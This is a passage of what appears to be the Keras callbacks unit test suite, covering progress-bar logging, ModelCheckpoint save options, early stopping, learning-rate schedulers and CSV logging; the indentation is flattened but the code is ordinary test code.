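    cb_list.on_predict_batch_end(batch)
  cb_list.on_predict_end()
  # e.g. {'on_predict_begin': 1, 'on_predict_batch_begin': 3, ...}
  return dict(counter.method_counts)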
class KerasCallbacksTest(keras_parameterized.TestCase):
def _get_model(self, input_shape=None):
layers = [
keras.layers.Dense(3, activation='relu'),
keras.layers.Dense(2, activation='softmax')
]
model = testing_utils.get_model_from_layers(layers, input_shape=input_shape)
model.compile(
loss='mse',
optimizer='rmsprop',
metrics=[keras.metrics.CategoricalAccuracy(name='my_acc')],
run_eagerly=testing_utils.should_run_eagerly())
return model
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
def test_progbar_logging(self):
model = self._get_model(input_shape=(3,))
x = tf.ones((200, 3))
y = tf.zeros((200, 2))
dataset = tf.data.Dataset.from_tensor_slices((x, y)).batch(10)
expected_log = r'(.*- loss:.*- my_acc:.*)+'
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(dataset, epochs=2, steps_per_epoch=10)
self.assertRegex(printed.contents(), expected_log)
@keras_parameterized.run_all_keras_modes
def test_callback_warning(self):
class SleepCallback(keras.callbacks.Callback):
def on_train_batch_end(self, batch, logs=None):
time.sleep(0.1)
model = sequential.Sequential()
model.add(keras.layers.Dense(1))
model.compile(
'sgd',
loss='mse',
run_eagerly=testing_utils.should_run_eagerly())
warning_messages = []
def warning(msg):
warning_messages.append(msg)
with tf.compat.v1.test.mock.patch.object(logging, 'warning', warning):
model.fit(
np.ones((16, 1), 'float32'),
np.ones((16, 1), 'float32'),
batch_size=3,
epochs=1,
callbacks=[SleepCallback()])
warning_msg = ('Callback method `on_train_batch_end` is slow compared '
'to the batch time')
self.assertIn(warning_msg, '\n'.join(warning_messages))
@keras_parameterized.run_all_keras_modes
def test_default_callbacks_no_warning(self):
# Test that without the callback no warning is raised
model = sequential.Sequential()
model.add(keras.layers.Dense(1))
model.compile(
'sgd',
loss='mse',
run_eagerly=testing_utils.should_run_eagerly())
warning_messages = []
def warning(msg):
warning_messages.append(msg)
with tf.compat.v1.test.mock.patch.object(logging, 'warning', warning):
model.fit(
np.ones((16, 1), 'float32'),
np.ones((16, 1), 'float32'),
batch_size=3,
epochs=1)
self.assertListEqual(warning_messages, [])
@keras_parameterized.run_with_all_model_types(exclude_models='functional')
@keras_parameterized.run_all_keras_modes
def test_progbar_logging_deferred_model_build(self):
model = self._get_model()
self.assertFalse(model.built)
x = tf.ones((200, 3))
y = tf.zeros((200, 2))
dataset = tf.data.Dataset.from_tensor_slices((x, y)).batch(10)
expected_log = r'(.*- loss:.*- my_acc:.*)+'
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(dataset, epochs=2, steps_per_epoch=10)
self.assertRegex(printed.contents(), expected_log)
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
def test_progbar_logging_validation_data(self):
model = self._get_model(input_shape=(3,))
x = tf.ones((50, 3))
y = tf.zeros((50, 2))
training_dataset = tf.data.Dataset.from_tensor_slices((x, y)).batch(10)
val_dataset = tf.data.Dataset.from_tensor_slices((x, y)).batch(10)
expected_log = r'(.*5/5.*- loss:.*- my_acc:.*- val_loss:.*- val_my_acc:.*)+'
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(training_dataset, epochs=2, validation_data=val_dataset)
self.assertRegex(printed.contents(), expected_log)
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_progbar_logging_validation_split(self):
model = self._get_model(input_shape=(3,))
x = np.ones((100, 3))
y = np.zeros((100, 2))
expected_log = (
r'(?s).*1/2.*8/8.*- loss:.*- my_acc:.*- val_loss:.*- val_my_acc:'
r'.*2/2.*8/8.*- loss:.*- my_acc:.*- val_loss:.*- val_my_acc:.*')
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(x, y, batch_size=10, epochs=2, validation_split=0.2)
self.assertRegex(printed.contents(), expected_log)
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_progbar_logging_training_validation(self):
model = self._get_model(input_shape=(2,))
def generator():
for _ in range(100):
yield [1, 1], 1
training = tf.data.Dataset \
.from_generator(
generator=generator,
output_types=('float64', 'float64'),
output_shapes=([2], [])) \
.batch(2) \
.repeat()
validation = tf.data.Dataset \
.from_generator(
generator=generator,
output_types=('float64', 'float64'),
output_shapes=([2], [])) \
.batch(2)
expected_log = (
r'(?s).*1/2.*20/20.*- loss:.*- my_acc:.*- val_loss:.*- val_my_acc:'
r'.*2/2.*20/20.*- loss:.*- my_acc:.*- val_loss:.*- val_my_acc:.*')
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(
x=training, validation_data=validation, epochs=2, steps_per_epoch=20)
self.assertRegex(printed.contents(), expected_log)
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_progbar_logging_with_dataset_and_partial_batch(self):
model = self._get_model(input_shape=(2,))
def generator():
# Have a partial batch at the end.
for _ in range(9):
yield np.random.random(2), 1
training = tf.data.Dataset \
.from_generator(
generator=generator,
output_types=('float64', 'float64'),
output_shapes=([2], [])) \
.batch(2)
validation = tf.data.Dataset \
.from_generator(
generator=generator,
output_types=('float64', 'float64'),
output_shapes=([2], [])) \
.batch(2)
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(x=training, validation_data=validation)
# Make sure the value of val_ metrics are not zeros.
log_content = printed.contents()
val_loss = re.findall(r'val_loss: (\d\.\d+)', log_content)
self.assertLen(val_loss, 1)
self.assertGreater(float(val_loss[0]), 0.0)
@keras_parameterized.run_with_all_model_types
def test_ModelCheckpoint(self):
if h5py is None:
return # Skip test if models cannot be saved.
layers = [
keras.layers.Dense(NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'),
keras.layers.Dense(NUM_CLASSES, activation='softmax')
]
model = testing_utils.get_model_from_layers(layers, input_shape=(10,))
model.compile(
loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc'])
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
filepath = os.path.join(temp_dir, 'checkpoint.h5')
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
# case 1
monitor = 'val_loss'
save_best_only = False
mode = 'auto'
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc'])
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# case 2
mode = 'min'
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# case 3
mode = 'max'
monitor = 'val_acc'
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# case 4
save_best_only = True
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# Case: metric not available.
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor='unknown',
save_best_only=True)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
# File won't be written.
assert not os.path.exists(filepath)
# case 5
save_best_only = False
period = 2
mode = 'auto'
filepath = os.path.join(temp_dir, 'checkpoint.{epoch:02d}.h5')
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
period=period)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=4,
verbose=1)
assert os.path.exists(filepath.format(epoch=2))
assert os.path.exists(filepath.format(epoch=4))
os.remove(filepath.format(epoch=2))
os.remove(filepath.format(epoch=4))
assert not os.path.exists(filepath.format(epoch=1))
assert not os.path.exists(filepath.format(epoch=3))
# Invalid use: this will raise a warning but not an Exception.
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode='unknown')
# Case 6: `ModelCheckpoint` with a combination of `save_freq` and `period`.
# Though `period` is deprecated, we're testing it for
# backward-compatibility.
filepath = os.path.join(temp_dir, 'checkpoint.epoch{epoch:02d}.h5')
cbks = [
keras.callbacks.ModelCheckpoint(
filepath, monitor=monitor, mode=mode, save_freq='epoch', period=5)
]
assert not os.path.exists(filepath.format(epoch=0))
assert not os.path.exists(filepath.format(epoch=5))
model.fit(
x_train,
y_train,
batch_size=2,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=10,
verbose=1)
assert not os.path.exists(filepath.format(epoch=1))
assert not os.path.exists(filepath.format(epoch=2))
assert not os.path.exists(filepath.format(epoch=3))
assert not os.path.exists(filepath.format(epoch=4))
assert os.path.exists(filepath.format(epoch=5))
assert not os.path.exists(filepath.format(epoch=6))
assert os.path.exists(filepath.format(epoch=10))
os.remove(filepath.format(epoch=5))
os.remove(filepath.format(epoch=10))
# Case 7: `ModelCheckpoint` with an integer `save_freq`
filepath = os.path.join(temp_dir, 'checkpoint.epoch{epoch:02d}.h5')
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
save_freq=15,
period=100) # The period should be ignored (this test verifies that).
]
assert not os.path.exists(filepath.format(epoch=3))
model.fit(
x_train,
y_train,
batch_size=2,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=10,
verbose=1)
assert not os.path.exists(filepath.format(epoch=1))
assert not os.path.exists(filepath.format(epoch=2))
assert os.path.exists(filepath.format(epoch=3))
assert not os.path.exists(filepath.format(epoch=4))
assert not os.path.exists(filepath.format(epoch=5))
assert os.path.exists(filepath.format(epoch=6))
assert not os.path.exists(filepath.format(epoch=7))
assert not os.path.exists(filepath.format(epoch=8))
assert os.path.exists(filepath.format(epoch=9))
os.remove(filepath.format(epoch=3))
os.remove(filepath.format(epoch=6))
os.remove(filepath.format(epoch=9))
# Case 8: `ModelCheckpoint` with valid and invalid save_freq argument.
with self.assertRaisesRegex(ValueError, 'Unrecognized save_freq'):
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
save_freq='invalid_save_freq')
# The following should not raise ValueError.
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
save_freq='epoch')
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
save_freq=3)
# Case 9: `ModelCheckpoint` with valid and invalid `options` argument.
with self.assertRaisesRegex(TypeError, 'tf.train.CheckpointOptions'):
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
save_weights_only=True,
mode=mode,
options=tf.saved_model.SaveOptions())
with self.assertRaisesRegex(TypeError, 'tf.saved_model.SaveOptions'):
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
save_weights_only=False,
mode=mode,
options=tf.train.CheckpointOptions())
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
save_weights_only=True,
mode=mode,
options=tf.train.CheckpointOptions())
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
save_weights_only=False,
mode=mode,
options=tf.saved_model.SaveOptions())
def _get_dummy_resource_for_model_checkpoint_testing(self):
def get_input_datasets():
# Simple training input.
train_input = [[1.]] * 16
train_label = [[0.]] * 16
ds = tf.data.Dataset.from_tensor_slices((train_input, train_label))
return ds.batch(8, drop_remainder=True)
# Very simple bias model to eliminate randomness.
optimizer = gradient_descent.SGD(0.1)
model = sequential.Sequential()
model.add(testing_utils.Bias(input_shape=(1,)))
model.compile(loss='mae', optimizer=optimizer, metrics=['mae'])
train_ds = get_input_datasets()
temp_dir = self.get_temp_dir()
filepath = os.path.join(temp_dir, 'checkpoint.epoch{epoch:02d}.h5')
# The filepath shouldn't exist at the beginning.
self.assertFalse(os.path.exists(filepath))
callback = keras.callbacks.ModelCheckpoint(
filepath=filepath, save_weights_only=True)
return model, train_ds, callback, filepath
def _run_load_weights_on_restart_test_common_iterations(self):
(model, train_ds, callback,
filepath) = self._get_dummy_resource_for_model_checkpoint_testing()
initial_epochs = 3
model.fit(train_ds, epochs=initial_epochs, callbacks=[callback])
# The files should exist after fitting with callback.
for epoch in range(initial_epochs):
self.assertTrue(os.path.exists(filepath.format(epoch=epoch + 1)))
self.assertFalse(os.path.exists(filepath.format(epoch=initial_epochs + 1)))
self.assertEqual(
callback._get_most_recently_modified_file_matching_pattern(filepath),
filepath.format(epoch=initial_epochs))
model.fit(train_ds, epochs=1)
weights_after_one_more_epoch = model.get_weights()
# The filepath should continue to exist after fitting without callback.
for epoch in range(initial_epochs):
self.assertTrue(os.path.exists(filepath.format(epoch=epoch + 1)))
return model, train_ds, filepath, weights_after_one_more_epoch
@staticmethod
def get_ModelCheckpoint_load_weights_on_restart_true_test(save_weights_only):
def func(self):
(model, train_ds, filepath, weights_after_one_more_epoch
) = self._run_load_weights_on_restart_test_common_iterations()
# Sleep for some short time period ensuring the files are created with
# a different time (in MacOS OSS the granularity is only 1 second).
time.sleep(2)
callback = keras.callbacks.ModelCheckpoint(
filepath=filepath,
save_weights_only=save_weights_only,
load_weights_on_restart=True)
model.fit(train_ds, epochs=1, callbacks=[callback])
weights_after_model_restoring_and_one_more_epoch = model.get_weights()
self.assertEqual(
callback._get_most_recently_modified_file_matching_pattern(filepath),
filepath.format(epoch=1))
model.fit(
train_ds,
epochs=1,
callbacks=[
keras.callbacks.ModelCheckpoint(
filepath=filepath,
save_weights_only=save_weights_only,
load_weights_on_restart=True)
])
weights_with_one_final_extra_epoch = model.get_weights()
# Asserting that the weights one epoch after initial fitting and another epoch
# after that are close, if a ModelCheckpoint with
# load_weights_on_restart=True is given (so the model is restored at the
# beginning of training).
self.assertAllClose(weights_after_one_more_epoch,
weights_after_model_restoring_and_one_more_epoch)
self.assertNotAllClose(weights_after_one_more_epoch,
weights_with_one_final_extra_epoch)
return func
@staticmethod
def get_ModelCheckpoint_load_weights_on_restart_false_test(save_weights_only):
def func(self):
(model, train_ds, filepath, weights_after_one_more_epoch
) = self._run_load_weights_on_restart_test_common_iterations()
model.fit(
train_ds,
epochs=1,
callbacks=[
keras.callbacks.ModelCheckpoint(
filepath=filepath, save_weights_only=save_weights_only)
])
weights_after_model_restoring_and_one_more_epoch = model.get_weights()
# Asserting the weights one epoch after initial fitting and another epoch
# after that are different, if a ModelCheckpoint with
# load_weights_on_restart=False is given (so the model is not restored at
# the beginning of training).
self.assertNotAllClose(weights_after_one_more_epoch,
weights_after_model_restoring_and_one_more_epoch)
return func
test_model_checkpoint_load_weights_on_restart_true_save_weights_only_true = \
get_ModelCheckpoint_load_weights_on_restart_true_test.__func__(True)
test_model_checkpoint_load_weights_on_restart_true_save_weights_only_false = \
get_ModelCheckpoint_load_weights_on_restart_true_test.__func__(False)
test_model_checkpoint_load_weights_on_restart_false_save_weights_only_true = \
get_ModelCheckpoint_load_weights_on_restart_false_test.__func__(True)
test_model_checkpoint_load_weights_on_restart_false_save_weights_only_false \
= get_ModelCheckpoint_load_weights_on_restart_false_test.__func__(False)
def test_ModelCheckpoint_override_if_file_exist(self):
(model, train_ds, filepath,
_) = self._run_load_weights_on_restart_test_common_iterations()
# Sleep for some short time period to ensure the files are created with
# a different time (in MacOS OSS the granularity is only 1 second).
time.sleep(2)
callback = keras.callbacks.ModelCheckpoint(
filepath=filepath, save_weights_only=True)
model.load_weights(
callback._get_most_recently_modified_file_matching_pattern(filepath))
weights_before_additional_fit = model.get_weights()
model.fit(train_ds, epochs=1, callbacks=[callback])
model.load_weights(
callback._get_most_recently_modified_file_matching_pattern(filepath))
weights_after_additional_fit = model.get_weights()
self.assertNotAllClose(weights_before_additional_fit,
weights_after_additional_fit)
def test_fit_with_ModelCheckpoint_with_tf_config(self):
(model, train_ds, callback,
_) = self._get_dummy_resource_for_model_checkpoint_testing()
os.environ['TF_CONFIG'] = json.dumps({
'cluster': {
'worker': ['localhost:23333']
},
'task': {
'type': 'worker',
'index': 0
}
})
# `model.fit()` should work regardless of the presence of `TF_CONFIG`.
model.fit(train_ds, epochs=1, callbacks=[callback])
def test_fit_with_ModelCheckpoint_with_dir_as_h5_filepath(self):
(model, train_ds, callback,
filepath) = self._get_dummy_resource_for_model_checkpoint_testing()
temp_dir = self.get_temp_dir()
filepath = os.path.join(temp_dir, 'temp.h5')
self.assertFalse(os.path.exists(filepath))
os.mkdir(filepath)
self.assertTrue(os.path.exists(filepath))
callback = keras.callbacks.ModelCheckpoint(filepath=filepath)
with self.assertRaisesRegex(
IOError, 'Please specify a non-directory '
'filepath for ModelCheckpoint.'):
model.fit(train_ds, epochs=1, callbacks=[callback])
def test_ModelCheckpoint_with_bad_path_placeholders(self):
(model, train_ds, callback,
filepath) = self._get_dummy_resource_for_model_checkpoint_testing()
temp_dir = self.get_temp_dir()
filepath = os.path.join(temp_dir, 'chkpt_{epoch:02d}_{mape:.2f}.h5')
callback = keras.callbacks.ModelCheckpoint(filepath=filepath)
with self.assertRaisesRegex(KeyError, 'Failed to format this callback '
'filepath.*'):
model.fit(train_ds, epochs=1, callbacks=[callback])
def test_ModelCheckpoint_nonblocking(self):
filepath = self.get_temp_dir()
# Should only cause a sync block when saving is actually performed.
callback = keras.callbacks.ModelCheckpoint(filepath=filepath, save_freq=100)
self.assertTrue(callback._supports_tf_logs)
model = keras.Sequential([keras.layers.Dense(1)])
cb_list = keras.callbacks.CallbackList([callback],
model=model,
epochs=1,
steps=10,
verbose=0)
tensor = tf.convert_to_tensor(1.)
def mock_numpy():
raise RuntimeError(
'If this error is seen, ModelCheckpoint is causing a blocking '
'NumPy conversion even when not checkpointing.')
tensor.numpy = mock_numpy
logs = {'metric': tensor}
cb_list.on_train_begin(logs)
cb_list.on_epoch_begin(0, logs)
cb_list.on_train_batch_begin(0, logs)
cb_list.on_train_batch_end(0, logs)
cb_list.on_epoch_end(0, logs)
cb_list.on_train_end(logs)
cb_list.on_test_begin(logs)
cb_list.on_test_batch_begin(0, logs)
cb_list.on_test_batch_end(0, logs)
cb_list.on_test_end(logs)
cb_list.on_predict_begin(logs)
cb_list.on_predict_batch_begin(logs)
cb_list.on_predict_batch_end(logs)
cb_list.on_predict_end(logs)
def test_ProgbarLogger_verbose_2_nonblocking(self):
# Should only cause a sync block on epoch end methods.
callback = keras.callbacks.ProgbarLogger(count_mode='steps')
self.assertTrue(callback._supports_tf_logs)
model = keras.Sequential([keras.layers.Dense(1)])
cb_list = keras.callbacks.CallbackList([callback],
model=model,
epochs=1,
steps=10,
verbose=2)
tensor = tf.convert_to_tensor(1.)
def mock_numpy():
raise RuntimeError(
'If this error is seen, ProgbarLogger is causing a blocking '
'NumPy conversion outside of the epoch-end methods.')
tensor.numpy = mock_numpy
logs = {'metric': tensor}
cb_list.on_train_begin(logs)
cb_list.on_epoch_begin(0, logs)
cb_list.on_train_batch_begin(0, logs)
cb_list.on_train_batch_end(0, logs)
cb_list.on_test_begin(logs)
cb_list.on_test_batch_begin(0, logs)
cb_list.on_test_batch_end(0, logs)
cb_list.on_test_end(logs)
with self.assertRaisesRegex(RuntimeError, 'NumPy conversion'):
# on_epoch_end should still block.
cb_list.on_epoch_end(0, logs)
cb_list.on_train_end(logs)
def test_EarlyStopping(self):
with self.cached_session():
np.random.seed(123)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc'])
cases = [
('max', 'val_acc'),
('min', 'val_loss'),
('auto', 'val_acc'),
('auto', 'loss'),
('unknown', 'unknown')
]
for mode, monitor in cases:
patience = 0
cbks = [
keras.callbacks.EarlyStopping(
patience=patience, monitor=monitor, mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
def test_EarlyStopping_reuse(self):
with self.cached_session():
np.random.seed(1337)
patience = 3
data = np.random.random((100, 1))
labels = np.where(data > 0.5, 1, 0)
model = keras.models.Sequential((keras.layers.Dense(
1, input_dim=1, activation='relu'), keras.layers.Dense(
1, activation='sigmoid'),))
model.compile(
optimizer='sgd', loss='binary_crossentropy', metrics=['accuracy'])
weights = model.get_weights()
# This should allow training to go for at least `patience` epochs
model.set_weights(weights)
stopper = keras.callbacks.EarlyStopping(monitor='acc', patience=patience)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) >= patience
def test_EarlyStopping_with_baseline(self):
with self.cached_session():
np.random.seed(1337)
baseline = 0.6
(data, labels), _ = testing_utils.get_test_data(
train_samples=100,
test_samples=50,
input_shape=(1,),
num_classes=NUM_CLASSES)
model = testing_utils.get_small_sequential_mlp(
num_hidden=1, num_classes=1, input_dim=1)
model.compile(
optimizer='sgd', loss='binary_crossentropy', metrics=['acc'])
stopper = keras.callbacks.EarlyStopping(monitor='acc',
baseline=baseline)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) == 1
patience = 3
stopper = keras.callbacks.EarlyStopping(monitor='acc',
patience=patience,
baseline=baseline)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) >= patience
def test_EarlyStopping_final_weights_when_restoring_model_weights(self):
class DummyModel(object):
def __init__(self):
self.stop_training = False
self.weights = -1
def get_weights(self):
return self.weights
def set_weights(self, weights):
self.weights = weights
def set_weight_to_epoch(self, epoch):
self.weights = epoch
early_stop = keras.callbacks.EarlyStopping(monitor='val_loss',
patience=2,
restore_best_weights=True)
early_stop.model = DummyModel()
losses = [0.2, 0.15, 0.1, 0.11, 0.12]
# The best configuration is in epoch 2 (loss = 0.1000).
epochs_trained = 0
early_stop.on_train_begin()
for epoch in range(len(losses)):
epochs_trained += 1
early_stop.model.set_weight_to_epoch(epoch=epoch)
early_stop.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
if early_stop.model.stop_training:
break
# The best configuration is in epoch 2 (loss = 0.1000),
# and while patience = 2, we're restoring the best weights,
# so we end up at the epoch with the best weights, i.e. epoch 2
self.assertEqual(early_stop.model.get_weights(), 2)
def test_RemoteMonitor(self):
if requests is None:
self.skipTest('`requests` required to run this test')
return None
monitor = keras.callbacks.RemoteMonitor()
# This will raise a warning since the default address is unreachable:
monitor.on_epoch_end(0, logs={'loss': 0.})
def test_LearningRateScheduler(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
cbks = [keras.callbacks.LearningRateScheduler(lambda x: 1. / (1. + x))]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
assert (
float(keras.backend.get_value(
model.optimizer.lr)) - 0.2) < keras.backend.epsilon()
cbks = [keras.callbacks.LearningRateScheduler(lambda x, lr: lr / 2)]
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
assert (
float(keras.backend.get_value(
model.optimizer.lr)) - 0.01 / 4) < keras.backend.epsilon()
cbks = [
keras.callbacks.LearningRateScheduler(
lambda epoch, _: learning_rate_schedule.CosineDecay(0.01, 2)
(epoch))
]
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
cosine_decay_np = 0.5 * (1 + np.cos(np.pi * (1 / 2)))
decayed_learning_rate = 0.01 * cosine_decay_np
assert (float(keras.backend.get_value(model.optimizer.lr)) -
decayed_learning_rate) < keras.backend.epsilon()
def test_ReduceLROnPlateau(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
def make_model():
tf.compat.v1.set_random_seed(1234)
np.random.seed(1337)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer=gradient_descent.SGD(lr=0.1))
return model
# TODO(psv): Make sure the callback works correctly when min_delta is
# set as 0. Test fails when the order of this callback and assertion is
# interchanged.
model = make_model()
cbks = [
keras.callbacks.ReduceLROnPlateau(
monitor='val_loss',
factor=0.1,
min_delta=0,
patience=1,
cooldown=5)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
self.assertAllClose(
float(keras.backend.get_value(model.optimizer.lr)), 0.1, atol=1e-4)
model = make_model()
# This should reduce the LR after the first epoch (due to high epsilon).
cbks = [
keras.callbacks.ReduceLROnPlateau(
monitor='val_loss',
factor=0.1,
min_delta=10,
patience=1,
cooldown=5)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=2)
self.assertAllClose(
float(keras.backend.get_value(model.optimizer.lr)), 0.01, atol=1e-4)
def test_ReduceLROnPlateau_patience(self):
class DummyOptimizer(object):
def __init__(self):
self.lr = keras.backend.variable(1.0)
class DummyModel(object):
def __init__(self):
self.optimizer = DummyOptimizer()
reduce_on_plateau = keras.callbacks.ReduceLROnPlateau(
monitor='val_loss', patience=2)
reduce_on_plateau.model = DummyModel()
losses = [0.0860, 0.1096, 0.1040]
lrs = []
for epoch in range(len(losses)):
reduce_on_plateau.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
lrs.append(keras.backend.get_value(reduce_on_plateau.model.optimizer.lr))
# The learning rates should be 1.0 except the last one
for lr in lrs[:-1]:
self.assertEqual(lr, 1.0)
self.assertLess(lrs[-1], 1.0)
def test_ReduceLROnPlateau_backwards_compatibility(self):
with tf.compat.v1.test.mock.patch.object(logging, 'warning') as mock_log:
reduce_on_plateau = keras.callbacks.ReduceLROnPlateau(epsilon=1e-13)
self.assertRegex(
str(mock_log.call_args), '`epsilon` argument is deprecated')
self.assertFalse(hasattr(reduce_on_plateau, 'epsilon'))
self.assertTrue(hasattr(reduce_on_plateau, 'min_delta'))
self.assertEqual(reduce_on_plateau.min_delta, 1e-13)
def test_CSVLogger(self):
with self.cached_session():
np.random.seed(1337)
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
filepath = os.path.join(temp_dir, 'log.tsv')
sep = '\t'
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
def make_model():
np.random.seed(1337)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer=gradient_descent.SGD(lr=0.1),
metrics=['accuracy'])
return model
# case 1, create new file with defined separator
model = make_model()
cbks = [keras.callbacks.CSVLogger(filepath, separator=sep)]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
with open(filepath) as csvfile:
